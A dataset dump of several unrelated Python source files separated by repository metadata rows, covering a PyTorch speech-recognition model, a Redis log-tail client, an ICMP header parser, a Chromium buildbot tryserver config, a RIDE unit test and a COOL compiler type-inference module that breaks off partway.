                sampled_tok = log_probs.topk(1)[1]
                output_tok = torch.zeros_like(log_probs)
                for idx, i in enumerate(sampled_tok):
                    output_tok[idx, int(i.item())] = 1
                output_tok = output_tok.unsqueeze(1)
rnn_inputs = torch.cat([output_tok, context.unsqueeze(1)], dim=-1)
# batch_size x maxlen x num_labels
log_probs_seq = torch.cat(log_probs_seq, dim=1)
return log_probs_seq.contiguous()
class PyramidLSTMLayer(nn.Module):
"""A Pyramid LSTM layer is a standard LSTM layer that halves the size
of the input in its hidden embeddings.
"""
def __init__(self, input_dim, hidden_dim, num_layers=1,
bidirectional=True, dropout=0.):
super().__init__()
self.rnn = nn.LSTM(
input_dim * 2, hidden_dim, num_layers=num_layers,
bidirectional=bidirectional, dropout=dropout,
batch_first=True)
self.input_dim = input_dim
self.hidden_dim = hidden_dim
self.num_layers = num_layers
self.bidirectional = bidirectional
self.dropout = dropout
def forward(self, inputs):
batch_size, maxlen, input_dim = inputs.size()
# reduce time resolution?
inputs = inputs.contiguous().view(batch_size, maxlen // 2, input_dim * 2)
outputs, hiddens = self.rnn(inputs)
return outputs, hiddens
class AttentionLayer(nn.Module):
"""
Attention module as in http://www.aclweb.org/anthology/D15-1166.
Trains an MLP to get attention weights.
"""
def __init__(self, input_dim, hidden_dim, multi_head=1):
super().__init__()
self.phi = nn.Linear(input_dim, hidden_dim*multi_head)
self.psi = nn.Linear(input_dim, hidden_dim)
if multi_head > 1:
self.fc_reduce = nn.Linear(input_dim*multi_head, input_dim)
self.multi_head = multi_head
self.hidden_dim = hidden_dim
def forward(self, decoder_state, listener_feat):
input_dim = listener_feat.size(2)
# decoder_state: batch_size x 1 x decoder_hidden_dim
# listener_feat: batch_size x maxlen x input_dim
comp_decoder_state = F.relu(self.phi(decoder_state))
comp_listener_feat = F.relu(reshape_and_apply(self.psi, listener_feat))
if self.multi_head == 1:
energy = torch.bmm(
comp_decoder_state,
comp_listener_feat.transpose(1, 2)
).squeeze(1)
attention_score = [F.softmax(energy, dim=-1)]
weights = attention_score[0].unsqueeze(2).repeat(1, 1, input_dim)
context = torch.sum(listener_feat * weights, dim=1)
else:
attention_score = []
for att_query in torch.split(
comp_decoder_state,
self.hidden_dim,
dim=-1,
):
                score = torch.softmax(
                    torch.bmm(
                        att_query,
                        comp_listener_feat.transpose(1, 2),
                    ).squeeze(dim=1),
                    dim=-1,  # torch.softmax requires an explicit dim
                )
attention_score.append(score)
projected_src = []
for att_s in attention_score:
weights = att_s.unsqueeze(2).repeat(1, 1, input_dim)
proj = torch.sum(listener_feat * weights, dim=1)
projected_src.append(proj)
context = self.fc_reduce(torch.cat(projected_src, dim=-1))
# context is the entries of listener input weighted by attention
return attention_score, context
def reshape_and_apply(Module, inputs):
batch_size, maxlen, input_dim = inputs.size()
reshaped = inputs.contiguous().view(-1, input_dim)
outputs = Module(reshaped)
return outputs.view(batch_size, maxlen, -1)
def label_smooth_loss(log_probs, labels, num_labels, smooth_param=0.1):
# convert labels to one_hotted
with torch.no_grad():
batch_size, maxlen = labels.size()
labels_onehotted = torch.zeros(
(batch_size, maxlen, num_labels),
device=labels.device,
).long()
labels_onehotted = labels_onehotted.scatter_(
-1, labels.long().unsqueeze(2), 1)
labels = labels_onehotted
assert log_probs.size() == labels.size()
label_lengths = torch.sum(torch.sum(labels, dim=-1), dim=-1, keepdim=True)
smooth_labels = ((1.0 - smooth_param) * labels + (smooth_param / num_labels)) * \
torch.sum(labels, dim=-1, keepdim=True)
loss = torch.sum(smooth_labels * log_probs, dim=-1)
loss = torch.sum(loss / label_lengths, dim=-1)
return -loss.mean()
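
# Minimal smoke test (illustrative addition; shape choices are assumptions, and it runs
# only if the src.utils import at the top of this module resolves):
if __name__ == "__main__":
    model = LASEncoderDecoder(input_dim=80, num_class=30, label_maxlen=16)
    feats = torch.randn(2, 64, 80)   # (batch, time, features); time divisible by 2**listener_num_layers
    lengths = torch.tensor([64, 64])
    log_probs, embedding = model(feats, lengths, ground_truth=None, teacher_force_prob=0.0)
    print(log_probs.shape, embedding.shape)  # torch.Size([2, 16, 30]) torch.Size([2, 1024])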
| 33.936224 | 99 | 0.574682 | 1,557 | 13,303 | 4.632627 | 0.152216 | 0.039928 | 0.014973 | 0.016498 | 0.289893 | 0.199501 | 0.138361 | 0.093442 | 0.05906 | 0.05906 | 0 | 0.014432 | 0.338495 | 13,303 | 391 | 100 | 34.023018 | 0.805227 | 0.084793 | 0 | 0.281457 | 0 | 0 | 0.001988 | 0 | 0 | 0 | 0 | 0 | 0.003311 | 1 | 0.05298 | false | 0 | 0.02649 | 0 | 0.13245 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8a0290b80b580216e83f792f9ef79d1580941d9 | 5,678 | py | Python | client/tail/src/tail/itail.py | flythinker/iloghub | 55fbe552e6d479ba757c2036f744647623b0a009 | [
"Apache-2.0"
] | 2 | 2018-07-02T07:07:03.000Z | 2018-07-15T05:14:40.000Z | client/tail/src/tail/itail.py | flythinker/iloghub | 55fbe552e6d479ba757c2036f744647623b0a009 | [
"Apache-2.0"
] | null | null | null | client/tail/src/tail/itail.py | flythinker/iloghub | 55fbe552e6d479ba757c2036f744647623b0a009 | [
"Apache-2.0"
] | 2 | 2018-07-10T09:41:16.000Z | 2018-10-19T07:54:55.000Z | import logging
import redis
import time
import math
import getopt
import sys,os
import yaml
from pathlib import Path
logger = logging.getLogger('itail')
formatter = logging.Formatter('%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)-8s: %(message)s')
console_handler = logging.StreamHandler(sys.stdout)
console_handler.setFormatter(formatter)  # equivalently, the formatter attribute can be assigned directly
logger.addHandler(console_handler)
logger.setLevel(logging.INFO)
ilogback_client_sample_yml='''
redis:
host: 127.0.0.1
port: 6379
pass: pass
database: 0
'''
class LogHubTail:
def __init__(self):
self.f_arg = None
self.c_arg = None
self.isOnlyStat = False
        self.isShowChannelName = False
def init_action(self):
logger.info("start init")
cwd = os.getcwd()
filepath = cwd + "/iloghub_client.yml"
        if not os.path.exists(filepath):
            logger.info("created file -> %s", filepath)
            with open(filepath, 'w') as file_object:
                file_object.write(ilogback_client_sample_yml)
        home = str(Path.home())
        glb_iloghub_cfg_dir = os.path.join(home, '.iloghub')  # the original concatenation was missing a path separator
        if not os.path.exists(glb_iloghub_cfg_dir):
            os.mkdir(glb_iloghub_cfg_dir)
            print("created dir -> ", glb_iloghub_cfg_dir)
def read_config(self):
        # Read the config file
        config_filepath = self.c_arg
        if config_filepath is None:
            # Try the current working directory first, then the home directory
            cwd = os.getcwd()
            filepath = cwd + "/iloghub_client.yml"
            filepath2 = str(Path.home()) + "/.iloghub/iloghub_client.yml"
            if os.path.exists(filepath):
                config_filepath = filepath
            elif os.path.exists(filepath2):
                config_filepath = filepath2
        if config_filepath is None:
            logger.info("iloghub_client.yml does not exist. Please initialize it with the 'itail init' command")
            sys.exit(0)
logger.info( "read config file from: %s" % config_filepath )
        with open(config_filepath) as f:
            self.config = yaml.safe_load(f)  # safe_load avoids constructing arbitrary Python objects
print('config',self.config )
def start_tail_task(self):
if self.isOnlyStat:
logger.info('itail starting (only Statistics)')
else:
logger.info('itail starting ')
#config
#{'redis': {'host': '127.0.0.1', 'port': 6379, 'pass': 'pass', 'database': 0}}
redisConfig = self.config['redis']
redis_host = redisConfig['host']
redis_port = redisConfig['port']
redis_pass = redisConfig['pass']
redis_database = redisConfig ['database']
pool = redis.ConnectionPool(host=redis_host, port=redis_port, db=redis_database)
r = redis.Redis(connection_pool=pool)
r.execute_command("AUTH", redis_pass)
logger.info('redis connect success')
        # Receive messages
ps = r.pubsub()
# ps.subscribe('log.hyp.mydev1')
ps.psubscribe( self.f_arg )
        self.last_time_10sec_int = math.floor(time.time() / 10)  # this bucket value changes every 10 seconds
self.total_line = 0
self.total_size = 0
def handle_message(message):
if message['type'] == 'message' or message['type'] == 'pmessage':
if not self.isOnlyStat:
logLine = message['data'].decode("utf8")
                    if self.isShowChannelName:
chName = message['channel'].decode("utf8")
print( chName +"->"+ logLine )
else:
print( logLine )
else:
                    cur_time_10sec_int = math.floor(time.time() / 10)  # same 10-second bucket as above (was / 5)
if cur_time_10sec_int == self.last_time_10sec_int:
self.total_line += 1
self.total_size += len(message['data'])
else:
logger.info("10sec stat -- line:%s bytes:%s" % (self.total_line, self.total_size))
                        self.total_line = 1
                        self.total_size = len(message['data'])
self.last_time_10sec_int = cur_time_10sec_int
while True:
message = ps.get_message()
if message:
handle_message(message)
time.sleep(0.001) # be nice to the system :)
else:
time.sleep(0.1)
# def listen_task():
# logger.info("listen_task ... ")
# for message in ps.listen():
# handle_message(message)
# logger.info('start listen log:' + self.f_arg)
# listen_task()
    # TODO: also read the global configuration
def start_tail(self):
        self.opts, self.args = getopt.getopt(sys.argv[1:], 'nsf:c:', [])  # -n show channel names, -s statistics only, -f loghub log channel name, -c manually specify the config file
logger.info ( ["opts" , self.opts] )
logger.info( ["args", self.args] )
if "init" in self.args:
self.init_action()
sys.exit(0)
for opt in self.opts:
print( opt[0], opt[1] )
if opt[0] == '-f':
self.f_arg = opt[1]
if opt[0] == '-c':
self.c_arg = opt[1]
if opt[0] == '-s':
self.isOnlyStat = True
if opt[0] == '-n':
                self.isShowChannelName = True
self.read_config()
if self.f_arg is not None:
self.start_tail_task()
else:
            logger.error("-n show channel names  -s statistics only  -f loghub log channel name  -c manually specify the config file\r\nthe -f parameter is missing.")
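# Hedged usage sketch (not part of the original tool; channel name and
# credentials are assumptions): publishing a test message for itail to consume.
#
#   import redis
#   r = redis.Redis(host='127.0.0.1', port=6379, db=0, password='pass')
#   r.publish('log.hyp.mydev1', 'hello from a publisher')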
def main():
tail = LogHubTail()
tail.start_tail()
if __name__ == "__main__":
#test1()
main() | 34.412121 | 123 | 0.547376 | 656 | 5,678 | 4.570122 | 0.26372 | 0.040027 | 0.024016 | 0.021348 | 0.148766 | 0.102735 | 0.094063 | 0.074716 | 0.049366 | 0.026684 | 0 | 0.018235 | 0.333568 | 5,678 | 165 | 124 | 34.412121 | 0.774049 | 0.076435 | 0 | 0.097744 | 0 | 0.015038 | 0.125359 | 0.010909 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0.030075 | 0.06015 | 0 | 0.120301 | 0.037594 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8a43059e13c59bbffb4972a5168e6bb7887635b | 249 | py | Python | bhp3_class/areas_for_class/packets/struct_icmp.py | JoeZajac/bhp3_class | 650d9741968d031e70cd7277c86aae1fc68202c9 | [
"MIT"
] | 13 | 2018-08-02T22:05:08.000Z | 2022-03-16T17:18:31.000Z | bhp3_class/areas_for_class/packets/struct_icmp.py | JoeZajac/bhp3_class | 650d9741968d031e70cd7277c86aae1fc68202c9 | [
"MIT"
] | null | null | null | bhp3_class/areas_for_class/packets/struct_icmp.py | JoeZajac/bhp3_class | 650d9741968d031e70cd7277c86aae1fc68202c9 | [
"MIT"
] | 7 | 2018-07-12T16:35:21.000Z | 2020-08-28T22:41:45.000Z | import struct
class ICMP:
def __init__(self, buff):
        # Unpack the 8-byte ICMP header: type, code, checksum, id, sequence.
        # Note: '<' is little-endian; strict network byte order would use '!'.
        header = struct.unpack('<BBHHH', buff)
        self.type = header[0]
        self.code = header[1]
        self.sum = header[2]  # checksum
        self.id = header[3]
self.seq = header[4] | 24.9 | 46 | 0.554217 | 33 | 249 | 4.060606 | 0.636364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02924 | 0.313253 | 249 | 10 | 47 | 24.9 | 0.754386 | 0 | 0 | 0 | 0 | 0 | 0.024 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.111111 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8adeebf1112413f0695b485db5e984fcb957d81 | 7,022 | py | Python | scripts/master/master_config_tryserver.py | bopopescu/build | 4e95fd33456e552bfaf7d94f7d04b19273d1c534 | [
"BSD-3-Clause"
] | null | null | null | scripts/master/master_config_tryserver.py | bopopescu/build | 4e95fd33456e552bfaf7d94f7d04b19273d1c534 | [
"BSD-3-Clause"
] | null | null | null | scripts/master/master_config_tryserver.py | bopopescu/build | 4e95fd33456e552bfaf7d94f7d04b19273d1c534 | [
"BSD-3-Clause"
] | 1 | 2020-07-23T11:05:06.000Z | 2020-07-23T11:05:06.000Z | # Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Shared configuration for the tryserver masters."""
# These modules come from scripts, which must be in the PYTHONPATH.
from master.factory import annotator_factory
from master.factory import chromium_factory
## BUILDER FACTORIES
m_chromium_win = chromium_factory.ChromiumFactory(
'src/build',
target_platform='win32')
m_chromium_win_ninja = chromium_factory.ChromiumFactory(
'src/out',
target_platform='win32')
m_chromium_linux = chromium_factory.ChromiumFactory(
'src/out',
target_platform='linux2')
m_chromium_linux_nohooks = chromium_factory.ChromiumFactory(
'src/out',
nohooks_on_update=True,
target_platform='linux2')
m_chromium_mac = chromium_factory.ChromiumFactory(
'src/xcodebuild',
target_platform='darwin')
m_chromium_mac_ninja = chromium_factory.ChromiumFactory(
'src/out',
target_platform='darwin')
# Chromium for ChromiumOS
m_chromium_chromiumos = chromium_factory.ChromiumFactory(
'src/out',
target_platform='linux2')
m_chromium_android = chromium_factory.ChromiumFactory(
'',
target_platform='linux2',
nohooks_on_update=True,
target_os='android')
# Tests that are single-machine shard-safe.
sharded_tests = [
'accessibility_unittests',
'aura_unittests',
'base_unittests',
'browser_tests',
'buildrunner_tests',
'cacheinvalidation_unittests',
'cast_unittests',
'cc_unittests',
'chromedriver_tests',
'chromedriver_unittests',
'components_unittests',
'content_browsertests',
'content_unittests',
'crypto_unittests',
'device_unittests',
'events_unittests',
'gcm_unit_tests',
'google_apis_unittests',
'gpu_unittests',
'jingle_unittests',
'media_unittests',
'nacl_loader_unittests',
'net_unittests',
'ppapi_unittests',
'printing_unittests',
'remoting_unittests',
'sync_integration_tests',
'sync_unit_tests',
'ui_base_unittests',
'ui_touch_selection_unittests',
'unit_tests',
'views_unittests',
]
# http://crbug.com/157234
win_sharded_tests = sharded_tests[:]
win_sharded_tests.remove('sync_integration_tests')
def CreateBuilder(platform, builder_name, target,
options, tests,
slavebuilddir=None,
factory_properties=None,
annotation_script=None,
ninja=True,
goma=False,
clang=False,
clobber=False,
run_default_swarm_tests=None,
maxTime=8*60*60,
slave_type='Trybot',
build_url=None):
"""Generates and register a builder along with its slave(s)."""
if platform not in ('win32', 'win64', 'linux', 'mac', 'android'):
raise Exception(platform + ' is not a known os type')
assert tests is not None or annotation_script, (
'Must either specify tests or use an annotation script')
factory_properties = (factory_properties or {}).copy()
run_default_swarm_tests = run_default_swarm_tests or []
factory_properties.setdefault('non_default', [
'check_licenses',
'chromedriver_tests',
'courgette_unittests',
'sync_integration_tests',
'url_unittests',
])
factory_properties.setdefault('gclient_env', {})
factory_properties['gclient_env'].setdefault('GYP_DEFINES', '')
factory_properties['gclient_env']['GYP_DEFINES'] += ' dcheck_always_on=1'
if not 'fastbuild=0' in factory_properties['gclient_env']['GYP_DEFINES']:
factory_properties['gclient_env']['GYP_DEFINES'] += ' fastbuild=1'
if platform in ('win32', 'win64'):
# http://crbug.com/157234
factory_properties.setdefault('sharded_tests', win_sharded_tests)
else:
factory_properties.setdefault('sharded_tests', sharded_tests)
build_tool = []
if platform in ('win32', 'win64'):
factory_properties['process_dumps'] = True
factory_properties['start_crash_handler'] = True
if ninja:
factory = m_chromium_win_ninja
factory_properties['gclient_env']['GYP_DEFINES'] += ' chromium_win_pch=0'
else:
factory = m_chromium_win
elif platform == 'linux' and slave_type == 'TrybotTester':
factory = m_chromium_linux_nohooks
elif platform == 'linux':
factory = m_chromium_linux
elif platform == 'android':
factory = m_chromium_android
elif platform == 'mac':
if ninja:
factory = m_chromium_mac_ninja
else:
factory = m_chromium_mac
if ninja:
factory_properties['gclient_env']['GYP_GENERATORS'] = 'ninja'
build_tool.append('--build-tool=ninja')
if goma:
if clang:
build_tool.append('--compiler=goma-clang')
else:
build_tool.append('--compiler=goma')
if clang:
factory_properties['gclient_env']['GYP_DEFINES'] += ' clang=1'
options = build_tool + ['--clobber-post-fail'] + (options or [])
compile_timeout = 3600
if annotation_script:
# Note new slave type AnnotatedTrybot; we don't want a compile step added
# in gclient_factory.py.
# TODO(maruel): Support enable_swarm_tests
builder_factory = factory.ChromiumAnnotationFactory(
slave_type='AnnotatedTrybot', target=target, tests=tests,
clobber=clobber,
options=options,
compile_timeout=compile_timeout,
factory_properties=factory_properties,
annotation_script=annotation_script, maxTime=maxTime)
else:
builder_factory = factory.ChromiumFactory(
slave_type=slave_type, target=target, tests=tests, options=options,
clobber=clobber,
compile_timeout=compile_timeout,
factory_properties=factory_properties,
# Swarming tests are only available to recipes.
# run_default_swarm_tests=run_default_swarm_tests,
build_url=build_url)
builder_info = {
'name': builder_name,
'factory': builder_factory,
}
if slavebuilddir:
builder_info['slavebuilddir'] = slavebuilddir
return builder_info
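# Hedged usage sketch (builder and test names are illustrative assumptions):
#
#   b = CreateBuilder('linux', 'linux_rel_trybot', 'Release',
#                     options=[], tests=['base_unittests', 'net_unittests'],
#                     goma=True)
#   # b == {'name': 'linux_rel_trybot', 'factory': <buildbot factory>}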
def prepend_type(prefix, test_list):
"""Prepend a prefix to a test name unless it's a special target.
This is used to mark valgrind tests, such as valgrind_ash_unittests.
"""
br_test = 'buildrunner_tests'
return (
['%s_%s' % (prefix, value) for value in test_list if value != br_test] +
filter(br_test.__eq__, test_list)) # Add back in buildrunner_tests.
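# e.g. prepend_type('valgrind', ['ash_unittests', 'buildrunner_tests'])
#      -> ['valgrind_ash_unittests', 'buildrunner_tests']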
def valgrind_tests(test_list):
return prepend_type('valgrind', test_list)
def without_tests(tests, without):
"""Exclude tests from a list."""
return [t for t in tests if t not in without]
# 32 bits tools can't link libwebcore.a anymore due to lack of virtual address
# space, including OSX 10.5.
valgrind_gyp_defines = (
chromium_factory.ChromiumFactory.MEMORY_TOOLS_GYP_DEFINES + ' enable_svg=0')
# drmemory_gyp_defines = 'build_for_tool=drmemory'
nacl_sdk_script = 'nacl_sdk_buildbot_run.py'
nacl_sdk_script_build = 'src/native_client_sdk/src/build_tools/buildbot_run.py'
| 31.630631 | 80 | 0.708488 | 844 | 7,022 | 5.593602 | 0.300948 | 0.072019 | 0.057191 | 0.04893 | 0.231731 | 0.143825 | 0.113959 | 0.113959 | 0.027537 | 0.027537 | 0 | 0.009811 | 0.187126 | 7,022 | 221 | 81 | 31.773756 | 0.817274 | 0.147821 | 0 | 0.215569 | 0 | 0 | 0.247643 | 0.051515 | 0 | 0 | 0 | 0.004525 | 0.005988 | 1 | 0.023952 | false | 0 | 0.011976 | 0.005988 | 0.05988 | 0.005988 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8b06edd0eaef753804f71c3493a4ebd638a9a7a | 2,871 | py | Python | utest/spec/test_librarymanager.py | ludovicurbain/SWIFT-RIDE | ab72df08a57101c433bfa5ad44949d9983e4e611 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | utest/spec/test_librarymanager.py | ludovicurbain/SWIFT-RIDE | ab72df08a57101c433bfa5ad44949d9983e4e611 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2019-07-16T19:27:56.000Z | 2019-07-16T19:27:56.000Z | utest/spec/test_librarymanager.py | ludovicurbain/SWIFT-RIDE | ab72df08a57101c433bfa5ad44949d9983e4e611 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # Copyright 2008-2015 Nokia Networks
# Copyright 2016- Robot Framework Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import unittest
import sys
from robotide.spec.libraryfetcher import get_import_result
from robotide.spec.librarymanager import LibraryManager
from resources import DATAPATH
sys.path.append(os.path.join(DATAPATH, 'libs'))
class TestLibraryManager(unittest.TestCase):
def setUp(self):
self._keywords = None
self._library_manager = LibraryManager(':memory:')
self._library_manager._initiate_database_connection()
self._library_manager._database.create_database()
def tearDown(self):
self._library_manager._database.close()
def test_database_update(self):
self._library_manager.fetch_keywords('BuiltIn', '', self._callback)
keywords = get_import_result('BuiltIn', '')
self._library_manager._handle_message()
self.assertFalse(self._library_manager._keywords_differ(keywords, self._keywords))
def test_manager_handles_callback_exception(self):
self._library_manager.fetch_keywords('Collections', '', (lambda *_: 1/0))
self._library_manager._handle_message()
self._library_manager.fetch_keywords('BuiltIn', '', self._callback)
self._library_manager._handle_message()
self.assertTrue(self._keywords is not None)
def test_fetching_unknown_library(self):
self._library_manager.fetch_keywords('FooBarZoo', '', self._callback)
self._library_manager._handle_message()
self.assertEqual(self._keywords, [])
def test_fetching_from_library_xml(self):
self._library_manager.fetch_keywords('LibSpecLibrary', '', self._callback)
self._library_manager._handle_message()
self.assertEqual(len(self._keywords), 3)
def test_manager_handler_library_that_throws_timeout_exception(self):
import sys
from os import path # DEBUG import non module
sys.path.append(path.dirname(path.abspath(__file__)))
import Exceptional as e
self._library_manager.fetch_keywords(e.__file__, '', self._callback)
self._library_manager._handle_message()
self.assertEqual(self._keywords, [])
def _callback(self, keywords):
self._keywords = keywords
if __name__ == '__main__':
unittest.main()
| 39.328767 | 90 | 0.730059 | 348 | 2,871 | 5.695402 | 0.399425 | 0.094349 | 0.15439 | 0.069627 | 0.274975 | 0.259334 | 0.171039 | 0.171039 | 0.102926 | 0.073663 | 0 | 0.008051 | 0.177987 | 2,871 | 72 | 91 | 39.875 | 0.83178 | 0.221874 | 0 | 0.26087 | 0 | 0 | 0.03383 | 0 | 0 | 0 | 0 | 0 | 0.108696 | 1 | 0.173913 | false | 0 | 0.217391 | 0 | 0.413043 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8b11385062c7ce4118bb8a9dfbf56f66d92d06f | 29,327 | py | Python | src/cool/semantics/type_inference.py | StrangerBugs/cool-compiler-2021 | 0499de5d27972f90dec49e1fa79ebe1b51a914b9 | [
"MIT"
] | 1 | 2021-02-24T22:40:50.000Z | 2021-02-24T22:40:50.000Z | src/cool/semantics/type_inference.py | StrangerBugs/cool-compiler-2021 | 0499de5d27972f90dec49e1fa79ebe1b51a914b9 | [
"MIT"
] | null | null | null | src/cool/semantics/type_inference.py | StrangerBugs/cool-compiler-2021 | 0499de5d27972f90dec49e1fa79ebe1b51a914b9 | [
"MIT"
] | null | null | null | """The type inference algorithm consists of a dependency digraph with special nodes that model how
components of the code are updated; it is then solved against the `context`. For this we create a structure
called DependencyGraph, in which we can create nodes (a structure called DependencyNode) and arcs between them.
An arc e = <x, y>, where x and y are dependency nodes, means that the type of node y is inferred from the type
of node x, so to solve the type of y we first need to infer the type of x. We also need basic nodes that only
carry a type, called AtomNode; during digraph formation an AtomNode is never inferred from another node. The
DependencyGraph consists of a dictionary[node, adjacency list]; the adjacency list has a declaration order,
which is fundamental for the inference algorithm. Given a case {x: [y, z]}, where x, y and z are nodes, the
algorithm determines the type of y and all of its dependencies before starting with z (a simple DFS). The
order within an adjacency list is the order of appearance in the program. At the end of the algorithm, every
node whose type could not be solved is tagged as `Object`.

DependencyNode hierarchy

AtomNode
 - type : Node type
VariableInfoNode
 - type : Node type
 - variable_info : Reference to the variable info of the scope
AttributeNode
 - type : Node type
 - attribute : Reference to the attribute of the class
ParameterNode
 - type : Node type
 - method : Reference to the method of the class
 - index : Index of the parameter of the method
ReturnTypeNode
 - type : Node type
 - method : Reference to the method of the class

Every node implements an `update` method that defines how its type is updated from its dependencies.
"""
from abc import ABC
from collections import OrderedDict, deque
from typing import Dict, List, Optional, Set, Tuple, Deque
import cool.semantics.utils.astnodes as ast
import cool.semantics.utils.errors as err
import cool.visitor as visitor
from cool.semantics.utils.scope import (
Attribute,
Context,
ErrorType,
Method,
Scope,
SemanticError,
Type,
VariableInfo,
)
class DependencyNode:
type: Type
def update(self, _type: Type) -> None:
raise NotImplementedError()
def __repr__(self):
return str(self)
@property
def is_ready(self):
return True
class AtomNode(DependencyNode):
def __init__(self, atom_type: Type):
self.type: Type = atom_type
def update(self, _type: Type) -> None:
pass
def __str__(self):
return f"Atom({self.type.name})"
class VariableInfoNode(DependencyNode):
def __init__(self, var_type: Type, variable_info: VariableInfo):
self.type: Type = var_type
self.variable_info: VariableInfo = variable_info
def update(self, _type):
self.type = self.variable_info.type = _type
def __str__(self):
return f"VarInfo({self.variable_info.name}, {self.type.name})"
class AttributeNode(DependencyNode):
def __init__(self, attr_type: Type, attribute: Attribute):
self.type: Type = attr_type
self.attribute: Attribute = attribute
def update(self, _type: Type) -> None:
self.type = self.attribute.type = _type
def __str__(self):
return f"Attr({self.attribute.name}, {self.type.name})"
class ParameterNode(DependencyNode):
def __init__(self, param_type: Type, method: Method, index: int):
self.type: Type = param_type
self.method: Method = method
self.index: int = index
def update(self, _type):
self.type = self.method.param_types[self.index] = _type
def __str__(self):
return f"Param({self.method.name}, {self.index}, {self.type.name})"
class ReturnTypeNode(DependencyNode):
def __init__(self, ret_type: Type, method: Method):
self.type: Type = ret_type
self.method: Method = method
def update(self, _type):
self.type = self.method.return_type = _type
def __str__(self):
return f"Return({self.method.name}, {self.type.name})"
class BranchedNode(DependencyNode, ABC):
branches: List[DependencyNode] = []
@property
def is_ready(self) -> bool:
return all(x.type.name != "AUTO_TYPE" for x in self.branches)
class ConditionalNode(BranchedNode):
def __init__(self, conditional_type, then_branch, else_branch):
self.type = conditional_type
self.branches = [then_branch, else_branch]
def update(self, _type: Type) -> None:
self.type = _type
def __str__(self):
return f"ConditionalNode({self.type.name})"
class CaseOfNode(BranchedNode):
def __init__(self, _type, branches):
self.type = _type
self.branches = branches
def update(self, _type: Type) -> None:
self.type = _type
def __str__(self):
return f"CaseOfNode({self.type.name})"
class DependencyGraph:
def __init__(self):
self.dependencies: Dict[DependencyNode, List[DependencyNode]] = OrderedDict()
def add_node(self, node: DependencyNode):
if node not in self.dependencies:
self.dependencies[node] = []
def add_edge(self, node: DependencyNode, other: DependencyNode):
try:
self.dependencies[node].append(other)
except KeyError:
self.dependencies[node] = [other]
self.add_node(other)
def update_dependencies(self, default_type: Type = None):
queue: Deque[DependencyNode] = deque(
node for node in self.dependencies if isinstance(node, AtomNode)
)
visited: Set[DependencyNode] = set(queue)
while queue:
node = queue.popleft()
if not node.is_ready:
continue
for adj in self.dependencies[node]:
if adj not in visited:
adj.update(node.type)
visited.add(adj)
if not isinstance(adj, BranchedNode):
queue.append(adj)
for node in self.dependencies:
if isinstance(node, BranchedNode) and node.is_ready:
node.update(Type.multi_join([x.type for x in node.branches]))
queue = deque(
node
for node in self.dependencies
if isinstance(node, BranchedNode) and node.type.name != "AUTO_TYPE"
)
visited.update(queue)
while queue:
node = queue.popleft()
for adj in self.dependencies[node]:
if adj not in visited:
adj.update(node.type)
visited.add(adj)
queue.append(adj)
if default_type is not None:
for node in self.dependencies:
if node not in visited:
node.update(default_type)
def __str__(self):
return (
"{\n\t"
+ "\n\t".join(f"{key}: {value}" for key, value in self.dependencies.items())
+ "\n}"
)
class InferenceChecker:
def __init__(self, context, errors):
self.context: Context = context
self.errors: List[str] = errors
self.current_type: Optional[Type] = None
self.current_method: Optional[Method] = None
self.variables: Dict[VariableInfo, VariableInfoNode] = {}
self.attributes = self.build_attributes_reference(context)
self.methods = self.build_methods_reference(context)
self.graph = DependencyGraph()
@staticmethod
def build_attributes_reference(
context: Context,
) -> Dict[Tuple[str, str], AttributeNode]:
attributes = {}
for typex in context:
for attr in typex.attributes:
attributes[typex.name, attr.name] = AttributeNode(attr.type, attr)
return attributes
@staticmethod
def build_methods_reference(
context: Context,
) -> Dict[Tuple[str, str], Tuple[List[ParameterNode], ReturnTypeNode]]:
methods = {}
for typex in context:
for method in typex.methods:
methods[typex.name, method.name] = (
[
ParameterNode(t, method, i)
for i, t in enumerate(method.param_types)
],
ReturnTypeNode(method.return_type, method),
)
return methods
@visitor.on("node")
def visit(self, node, scope):
pass
@visitor.when(ast.ProgramNode)
